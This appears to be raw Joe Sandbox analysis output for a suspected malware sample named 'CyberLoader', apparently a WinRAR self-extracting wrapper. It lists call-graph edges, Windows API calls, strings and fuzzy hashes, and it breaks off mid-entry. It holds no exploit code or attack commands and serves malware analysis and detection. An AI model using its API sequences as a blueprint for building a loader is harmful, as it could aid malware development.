24074->24104 24077 27c9bc 24077->24020 24078->24035 24079->24037 24081 281ad9 24080->24081 24082 281af2 24081->24082 24085 281b06 24081->24085 24106 28075b 84 API calls 24082->24106 24084 281af9 24084->24085 24086->24017 24087->24044 24088->24053 24089->24046 24090->24052 24092 27acf5 GetVersionExW 24091->24092 24093 277dcb 24092->24093 24093->24062 24099 27ca82 __vsnwprintf_l 24094->24099 24095 27cbf7 24096 27cc1f 24095->24096 24097 27ca0b 6 API calls 24095->24097 24098 28067c SetThreadExecutionState RaiseException 24096->24098 24097->24096 24101 27cbee 24098->24101 24099->24095 24100 2884bd 99 API calls 24099->24100 24099->24101 24102 27ab70 84 API calls 24099->24102 24100->24099 24101->24066 24102->24099 24103->24066 24104->24077 24105->24077 24106->24084 24107->23841 24108->23841 24109->23839 24111 275e4a 24110->24111 24155 275d67 24111->24155 24114 275e7d 24115 275eb5 24114->24115 24160 27ad65 CharUpperW CompareStringW 24114->24160 24115->23853 24117 278289 24116->24117 24166 28179d CharUpperW 24117->24166 24119 278333 24119->23856 24121 277d7b 24120->24121 24122 277dbb 24121->24122 24167 277043 74 API calls 24121->24167 24122->23864 24124 277db3 24168 276dc1 74 API calls 24124->24168 24126->23917 24128 279d73 24127->24128 24131 279d82 24127->24131 24129 279d79 FlushFileBuffers 24128->24129 24128->24131 24129->24131 24130 279dfb SetFileTime 24130->23922 24131->24130 24132->23845 24133->23847 24134->23858 24135->23864 24136->23864 24137->23862 24138->23877 24139->23869 24140->23877 24142 279992 GetFileType 24141->24142 24143 27998f 24141->24143 24144 2799a0 24142->24144 24143->23881 24144->23881 24145->23887 24146->23889 24147->23890 24148->23914 24149->23914 24150->23914 24151->23914 24152->23914 24153->23916 24154->23925 24161 275c64 24155->24161 24157 275d88 24157->24114 24159 275c64 2 API calls 24159->24157 24160->24114 24162 275c6e 24161->24162 24163 275d56 24162->24163 24165 27ad65 CharUpperW CompareStringW 24162->24165 24163->24157 24163->24159 
24165->24162 24166->24119 24167->24124 24168->24122 24170 27c8db 24169->24170 24175 27a90e 84 API calls 24170->24175 24172 27c90d 24176 27a90e 84 API calls 24172->24176 24174 27c918 24175->24172 24176->24174 24178 27a5fe 24177->24178 24179 27a691 FindNextFileW 24178->24179 24180 27a621 FindFirstFileW 24178->24180 24182 27a6b0 24179->24182 24183 27a69c GetLastError 24179->24183 24181 27a638 24180->24181 24188 27a675 24180->24188 24184 27b66c 2 API calls 24181->24184 24182->24188 24183->24182 24185 27a64d 24184->24185 24186 27a651 FindFirstFileW 24185->24186 24187 27a66a GetLastError 24185->24187 24186->24187 24186->24188 24187->24188 24188->23795 24198 289d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24189->24198 24191 289d21 24193 289d2d 24191->24193 24199 289d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24191->24199 24193->23572 24193->23574 24194->23573 24195->23582 24196->23582 24197->23585 24198->24191 24199->24193 24200->23592 24202 279ef7 76 API calls 24201->24202 24203 271f5b 24202->24203 24204 271f78 24203->24204 24205 2719a6 97 API calls 24203->24205 24204->23601 24204->23602 24206 271f68 24205->24206 24206->24204 24208 276dc1 74 API calls 24206->24208 24208->24204 24210 28acc8 GetDlgItem 24209->24210 24211 28ac8f GetMessageW 24209->24211 24210->23612 24210->23613 24212 28acb4 TranslateMessage DispatchMessageW 24211->24212 24213 28aca5 IsDialogMessageW 24211->24213 24212->24210 24213->24210 24213->24212 24767 28b8e0 93 API calls _swprintf 24768 288ce0 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24771 2a16e0 CloseHandle 24216 28e1f9 24217 28e203 24216->24217 24218 28df59 ___delayLoadHelper2@8 19 API calls 24217->24218 24219 28e210 24218->24219 24811 29abfd 6 API calls _ValidateLocalCookies 24813 28ebf7 20 API calls 24774 28eac0 27 API calls pre_c_initialization 24816 29ebc1 21 API calls __vsnwprintf_l 24817 2897c0 10 API calls 24776 299ec0 21 API calls 24818 29b5c0 GetCommandLineA GetCommandLineW 24777 28a8c2 GetDlgItem 
EnableWindow ShowWindow SendMessageW 24245 2710d5 24250 275bd7 24245->24250 24251 275be1 __EH_prolog 24250->24251 24252 27b07d 82 API calls 24251->24252 24253 275bed 24252->24253 24257 275dcc GetCurrentProcess GetProcessAffinityMask 24253->24257 24779 28acd0 100 API calls 24822 2809d0 82 API calls 24823 2819d0 26 API calls std::bad_exception::bad_exception 24265 28ead2 24266 28eade ___FrameUnwindToState 24265->24266 24291 28e5c7 24266->24291 24268 28eae5 24270 28eb0e 24268->24270 24371 28ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 24268->24371 24278 28eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24270->24278 24302 29824d 24270->24302 24274 28eb2d ___FrameUnwindToState 24275 28ebad 24310 28f020 24275->24310 24278->24275 24372 297243 38 API calls 2 library calls 24278->24372 24286 28ebd9 24288 28ebe2 24286->24288 24373 29764a 28 API calls _abort 24286->24373 24374 28e73e 13 API calls 2 library calls 24288->24374 24292 28e5d0 24291->24292 24375 28ed5b IsProcessorFeaturePresent 24292->24375 24294 28e5dc 24376 292016 24294->24376 24296 28e5e1 24297 28e5e5 24296->24297 24385 2980d7 24296->24385 24297->24268 24300 28e5fc 24300->24268 24304 298264 24302->24304 24303 28ec4a _ValidateLocalCookies 5 API calls 24305 28eb27 24303->24305 24304->24303 24305->24274 24306 2981f1 24305->24306 24308 298220 24306->24308 24307 28ec4a _ValidateLocalCookies 5 API calls 24309 298249 24307->24309 24308->24307 24309->24278 24435 28f350 24310->24435 24312 28f033 GetStartupInfoW 24313 28ebb3 24312->24313 24314 29819e 24313->24314 24315 29b290 51 API calls 24314->24315 24316 2981a7 24315->24316 24318 28ebbc 24316->24318 24437 29b59a 38 API calls 24316->24437 24319 28d5d4 24318->24319 24438 2800cf 24319->24438 24323 28d5f3 24487 28a335 24323->24487 24325 28d5fc 24491 2813b3 GetCPInfo 24325->24491 24327 28d606 ___scrt_get_show_window_mode 24328 28d619 GetCommandLineW 24327->24328 
24329 28d628 24328->24329 24330 28d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24328->24330 24494 28bc84 24329->24494 24331 27400a _swprintf 51 API calls 24330->24331 24333 28d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24331->24333 24505 28aded LoadBitmapW 24333->24505 24336 28d6a0 24499 28d287 24336->24499 24337 28d636 OpenFileMappingW 24340 28d64f MapViewOfFile 24337->24340 24341 28d696 CloseHandle 24337->24341 24343 28d68d UnmapViewOfFile 24340->24343 24344 28d660 __vsnwprintf_l 24340->24344 24341->24330 24343->24341 24348 28d287 2 API calls 24344->24348 24350 28d67c 24348->24350 24349 288835 8 API calls 24351 28d76a DialogBoxParamW 24349->24351 24350->24343 24352 28d7a4 24351->24352 24353 28d7bd 24352->24353 24354 28d7b6 Sleep 24352->24354 24357 28d7cb 24353->24357 24535 28a544 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 24353->24535 24354->24353 24356 28d7ea DeleteObject 24358 28d7ff DeleteObject 24356->24358 24359 28d806 24356->24359 24357->24356 24358->24359 24360 28d849 24359->24360 24361 28d837 24359->24361 24532 28a39d 24360->24532 24536 28d2e6 6 API calls 24361->24536 24364 28d83d CloseHandle 24364->24360 24365 28d883 24366 29757e GetModuleHandleW 24365->24366 24367 28ebcf 24366->24367 24367->24286 24368 2976a7 24367->24368 24670 297424 24368->24670 24371->24268 24372->24275 24373->24288 24374->24274 24375->24294 24377 29201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24376->24377 24389 29310e 24377->24389 24381 292031 24382 29203c 24381->24382 24403 29314a DeleteCriticalSection 24381->24403 24382->24296 24384 292029 24384->24296 24431 29b73a 24385->24431 24388 29203f 8 API calls 3 library calls 24388->24297 24391 293117 24389->24391 24392 293140 24391->24392 24393 292025 24391->24393 24404 293385 24391->24404 24409 29314a DeleteCriticalSection 24392->24409 24393->24384 24395 29215c 24393->24395 24424 29329a 24395->24424 24397 292171 24397->24381 24398 292166 24398->24397 
24429 293348 6 API calls try_get_function 24398->24429 24400 29217f 24401 29218c 24400->24401 24430 29218f 6 API calls ___vcrt_FlsFree 24400->24430 24401->24381 24403->24384 24410 293179 24404->24410 24407 2933bc InitializeCriticalSectionAndSpinCount 24408 2933a8 24407->24408 24408->24391 24409->24393 24411 2931a9 24410->24411 24412 2931ad 24410->24412 24411->24412 24416 2931cd 24411->24416 24417 293219 24411->24417 24412->24407 24412->24408 24414 2931d9 GetProcAddress 24415 2931e9 __crt_fast_encode_pointer 24414->24415 24415->24412 24416->24412 24416->24414 24418 293241 LoadLibraryExW 24417->24418 24419 293236 24417->24419 24420 29325d GetLastError 24418->24420 24423 293275 24418->24423 24419->24411 24422 293268 LoadLibraryExW 24420->24422 24420->24423 24421 29328c FreeLibrary 24421->24419 24422->24423 24423->24419 24423->24421 24425 293179 try_get_function 5 API calls 24424->24425 24426 2932b4 24425->24426 24427 2932cc TlsAlloc 24426->24427 24428 2932bd 24426->24428 24428->24398 24429->24400 24430->24397 24434 29b753 24431->24434 24432 28ec4a _ValidateLocalCookies 5 API calls 24433 28e5ee 24432->24433 24433->24300 24433->24388 24434->24432 24436 28f367 24435->24436 24436->24312 24436->24436 24437->24316 24439 28e360 24438->24439 24440 2800d9 GetModuleHandleW 24439->24440 24441 2800f0 GetProcAddress 24440->24441 24442 280154 24440->24442 24444 280109 24441->24444 24445 280121 GetProcAddress 24441->24445 24443 280484 GetModuleFileNameW 24442->24443 24546 2970dd 42 API calls 2 library calls 24442->24546 24458 2804a3 24443->24458 24444->24445 24445->24442 24446 280133 24445->24446 24446->24442 24448 2803be 24448->24443 24449 2803c9 GetModuleFileNameW CreateFileW 24448->24449 24450 280478 CloseHandle 24449->24450 24451 2803fc SetFilePointer 24449->24451 24450->24443 24451->24450 24452 28040c ReadFile 24451->24452 24452->24450 24454 28042b 24452->24454 24454->24450 24457 280085 2 API calls 24454->24457 24456 2804d2 CompareStringW 24456->24458 24457->24454 24458->24456 

                                                  Control-flow Graph

                                                  APIs
                                                  • FindResourceW.KERNEL32(0028AE4D,PNG,?,?,?,0028AE4D,00000066), ref: 00289E2E
                                                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0028AE4D,00000066), ref: 00289E46
                                                  • LoadResource.KERNEL32(00000000,?,?,?,0028AE4D,00000066), ref: 00289E59
                                                  • LockResource.KERNEL32(00000000,?,?,?,0028AE4D,00000066), ref: 00289E64
                                                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0028AE4D,00000066), ref: 00289E82
                                                  • GlobalLock.KERNEL32 ref: 00289E93
                                                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00289EFC
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00289F1B
                                                  • GlobalFree.KERNEL32 ref: 00289F22
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                                  • String ID: PNG
                                                  • API String ID: 4097654274-364855578
                                                  • Opcode ID: aa189344661eb95369fc0a4dd906071331d2dafc0d77162ec47878a72e6ee9c5
                                                  • Instruction ID: 3fb2acb1840b0bc6f6e72e211b881a2ed277698c71d9ee701f71a562515c9da9
                                                  • Opcode Fuzzy Hash: aa189344661eb95369fc0a4dd906071331d2dafc0d77162ec47878a72e6ee9c5
                                                  • Instruction Fuzzy Hash: 6A317075215306ABC711AF61EC4CA2BBBA9FF96751B080529F906D22A0DF32DC50CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0027A4EF,000000FF,?,?), ref: 0027A628
                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0027A4EF,000000FF,?,?), ref: 0027A65E
                                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0027A4EF,000000FF,?,?), ref: 0027A66A
                                                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,0027A4EF,000000FF,?,?), ref: 0027A692
                                                  • GetLastError.KERNEL32(?,?,?,?,0027A4EF,000000FF,?,?), ref: 0027A69E
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: FileFind$ErrorFirstLast$Next
                                                  • String ID:
                                                  • API String ID: 869497890-0
                                                  • Opcode ID: c0cafa512ee101cc9bb812b0bef81d88dd41560bd37b50e0225b90e31c3eae97
                                                  • Instruction ID: 21e167e471c5a40365107961ceae66438b98e3b2e382b107d5d8bb768994f7fb
                                                  • Opcode Fuzzy Hash: c0cafa512ee101cc9bb812b0bef81d88dd41560bd37b50e0225b90e31c3eae97
                                                  • Instruction Fuzzy Hash: 8B419176515242AFC724EF28C884ADEF7ECBF89350F044A2AF59DD3240D774A9648F92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000000,?,00297513,00000000,002ABAD8,0000000C,0029766A,00000000,00000002,00000000), ref: 0029755E
                                                  • TerminateProcess.KERNEL32(00000000,?,00297513,00000000,002ABAD8,0000000C,0029766A,00000000,00000002,00000000), ref: 00297565
                                                  • ExitProcess.KERNEL32 ref: 00297577
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 0071dfc4292b61e9ace86f7aa23c012f31673707f43ad60ccb106156aa06c205
                                                  • Instruction ID: 3d5b51f36f4201159139358c16ad867fad38a0cabc26b9f3434b068799cd22c1
                                                  • Opcode Fuzzy Hash: 0071dfc4292b61e9ace86f7aa23c012f31673707f43ad60ccb106156aa06c205
                                                  • Instruction Fuzzy Hash: 52E0B631124A48ABCF51EF64ED0DA493B69EB52741F518414FD098A222DF35DE62DA90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog_memcmp
                                                  • String ID:
                                                  • API String ID: 3004599000-0
                                                  • Opcode ID: f1e45affac610e462e6118726d81c3dfd74faa67a07a01eb57e30f77c12c11f4
                                                  • Instruction ID: 63e7d0e947aa548d4f6019adcc89f9b24a17ae99160553489354540a52b34221
                                                  • Opcode Fuzzy Hash: f1e45affac610e462e6118726d81c3dfd74faa67a07a01eb57e30f77c12c11f4
                                                  • Instruction Fuzzy Hash: 93821D70964246AEDF25DF74C489BFAB7A9AF05300F08C1B9ED4D9B142DB305AA4CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0028AEE5
                                                    • Part of subcall function 0027130B: GetDlgItem.USER32(00000000,00003021), ref: 0027134F
                                                    • Part of subcall function 0027130B: SetWindowTextW.USER32(00000000,002A35B4), ref: 00271365
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prologItemTextWindow
                                                  • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                  • API String ID: 810644672-8108337
                                                  • Opcode ID: fb4c4916542a2ad4eb4e2c5f2595442c5dbe09e41c69b8be08ebc067897284b8
                                                  • Instruction ID: 9be710c692d2399a34a64b5a1e43210a70fb5a34588f787d49cf826aa11ee46d
                                                  • Opcode Fuzzy Hash: fb4c4916542a2ad4eb4e2c5f2595442c5dbe09e41c69b8be08ebc067897284b8
                                                  • Instruction Fuzzy Hash: FE421775966255BEEB22BF70AC4EFBE777CAB12701F00415AF608A60D2CB744D64CB21
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32), ref: 002800E4
                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 002800F6
                                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00280127
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002803D4
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002803F0
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00280402
                                                  • ReadFile.KERNEL32(00000000,?,00007FFE,002A3BA4,00000000), ref: 00280421
                                                  • CloseHandle.KERNEL32(00000000), ref: 00280479
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0028048F
                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 002804E7
                                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00280510
                                                  • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0028054A
                                                    • Part of subcall function 00280085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002800A0
                                                    • Part of subcall function 00280085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0027EB86,Crypt32.dll,00000000,0027EC0A,?,?,0027EBEC,?,?,?), ref: 002800C2
                                                  • _swprintf.LIBCMT ref: 002805BE
                                                  • _swprintf.LIBCMT ref: 0028060A
                                                    • Part of subcall function 0027400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0027401D
                                                  • AllocConsole.KERNEL32 ref: 00280612
                                                  • GetCurrentProcessId.KERNEL32 ref: 0028061C
                                                  • AttachConsole.KERNEL32(00000000), ref: 00280623
                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00280649
                                                  • WriteConsoleW.KERNEL32(00000000), ref: 00280650
                                                  • Sleep.KERNEL32(00002710), ref: 0028065B
                                                  • FreeConsole.KERNEL32 ref: 00280661
                                                  • ExitProcess.KERNEL32 ref: 00280669
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                  • String ID: <*$ ?*$(>*$(@*$0A*$4=*$8<*$<?*$@>*$@@*$D=*$DA*$DXGIDebug.dll$P<*$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;*$T?*$X>*$X@*$\A*$`=*$dwmapi.dll$kernel32$l<*$p>*$p?*$p@*$uxtheme.dll$x=*$|<*$>*$?*
                                                  • API String ID: 1201351596-984101849
                                                  • Opcode ID: a18ae0542078cbd275e5f6f769edfd776a678b3ca75b9b3e882f9e91766fe5d7
                                                  • Instruction ID: 08ebc22711a49ae5952fe55f1752d97d30a0d4fecd3e62cb830eb7c46a7a95ec
                                                  • Opcode Fuzzy Hash: a18ae0542078cbd275e5f6f769edfd776a678b3ca75b9b3e882f9e91766fe5d7
                                                  • Instruction Fuzzy Hash: 60D186B11693849FD730EF50D849B9FBBE8BF86704F40491DF68996190DFB086688F62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 002800CF: GetModuleHandleW.KERNEL32(kernel32), ref: 002800E4
                                                    • Part of subcall function 002800CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 002800F6
                                                    • Part of subcall function 002800CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00280127
                                                    • Part of subcall function 00289DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00289DAC
                                                    • Part of subcall function 0028A335: OleInitialize.OLE32(00000000), ref: 0028A34E
                                                    • Part of subcall function 0028A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0028A385
                                                    • Part of subcall function 0028A335: SHGetMalloc.SHELL32(002B8430), ref: 0028A38F
                                                    • Part of subcall function 002813B3: GetCPInfo.KERNEL32(00000000,?), ref: 002813C4
                                                    • Part of subcall function 002813B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 002813D8
                                                  • GetCommandLineW.KERNEL32 ref: 0028D61C
                                                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0028D643
                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0028D654
                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0028D68E
                                                    • Part of subcall function 0028D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0028D29D
                                                    • Part of subcall function 0028D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0028D2D9
                                                  • CloseHandle.KERNEL32(00000000), ref: 0028D697
                                                  • GetModuleFileNameW.KERNEL32(00000000,002CDC90,00000800), ref: 0028D6B2
                                                  • SetEnvironmentVariableW.KERNEL32(sfxname,002CDC90), ref: 0028D6BE
                                                  • GetLocalTime.KERNEL32(?), ref: 0028D6C9
                                                  • _swprintf.LIBCMT ref: 0028D708
                                                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0028D71A
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0028D721
                                                  • LoadIconW.USER32(00000000,00000064), ref: 0028D738
                                                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0028D789
                                                  • Sleep.KERNEL32(?), ref: 0028D7B7
                                                  • DeleteObject.GDI32 ref: 0028D7F0
                                                  • DeleteObject.GDI32(?), ref: 0028D800
                                                  • CloseHandle.KERNEL32 ref: 0028D843
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xj,
                                                  • API String ID: 788466649-743829192
                                                  • Opcode ID: d450e4d3fcf123b47ba40d8a7b9aec0094842cced68d289b82359c6063ae9a8f
                                                  • Instruction ID: 9f306a542e8d158b206fc55f382501b563757b376dc0ae835358116b09e55cf3
                                                  • Opcode Fuzzy Hash: d450e4d3fcf123b47ba40d8a7b9aec0094842cced68d289b82359c6063ae9a8f
                                                  • Instruction Fuzzy Hash: 2061E075921241AFD320BFA1BC4DF2B37ACAB4A741F04052AF449921E2DF74DD28CB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0028BDFA
                                                    • Part of subcall function 0028AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0028AAFE
                                                  • SetWindowTextW.USER32(?,?), ref: 0028C127
                                                  • _wcsrchr.LIBVCRUNTIME ref: 0028C2B1
                                                  • GetDlgItem.USER32(?,00000066), ref: 0028C2EC
                                                  • SetWindowTextW.USER32(00000000,?), ref: 0028C2FC
                                                  • SendMessageW.USER32(00000000,00000143,00000000,002BA472), ref: 0028C30A
                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0028C335
                                                  Strings
                                                  Memory Dump Source
